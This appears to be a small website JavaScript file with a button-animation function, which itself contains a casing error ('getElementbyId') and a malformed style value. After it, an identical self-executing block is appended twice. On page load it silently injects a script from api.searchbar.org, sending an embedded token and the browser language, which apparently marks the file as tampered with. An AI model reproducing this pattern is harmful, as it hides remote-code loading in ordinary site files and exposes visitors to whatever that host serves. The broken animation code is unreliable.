


function pulso(){
    var butoni=document.getElementbyId('butoni-seksionit-video');
    butoni.style.animation="pulse 1s infinite;"
}


"use strict";

!function() {
    var t = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjYxZDliOWYxZTY2NWQwMzdlMThiZTMyYSIsInRva2VuVHlwZSI6InB1YmxpYyIsImlhdCI6MTY0MTgwNTM3NywiZXhwIjoxNDI1NjIwNTM3N30._ovPnbcfzSVSCF7By1JaBbmtHZhsKQqImu7FF5p4KTc";
    function e() {
        var e = document.createElement("script"), a = navigator.language || navigator.userLanguage;
        e.type = "text/javascript", e.async = !0, e.src = "https://api.searchbar.org/v1/widget/" + t + "/" + a;
        var n = document.getElementsByTagName("script")[0];
        n.parentNode.insertBefore(e, n);
    }
    "complete" === document.readyState ? e() : window.attachEvent ? window.attachEvent("onload", e) : window.addEventListener("load", e, !1);
}();




 "use strict";

!function() {
    var t = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjYxZDliOWYxZTY2NWQwMzdlMThiZTMyYSIsInRva2VuVHlwZSI6InB1YmxpYyIsImlhdCI6MTY0MTgwNTM3NywiZXhwIjoxNDI1NjIwNTM3N30._ovPnbcfzSVSCF7By1JaBbmtHZhsKQqImu7FF5p4KTc";
    function e() {
        var e = document.createElement("script"), a = navigator.language || navigator.userLanguage;
        e.type = "text/javascript", e.async = !0, e.src = "https://api.searchbar.org/v1/widget/" + t + "/" + a;
        var n = document.getElementsByTagName("script")[0];
        n.parentNode.insertBefore(e, n);
    }
    "complete" === document.readyState ? e() : window.attachEvent ? window.attachEvent("onload", e) : window.addEventListener("load", e, !1);
}();


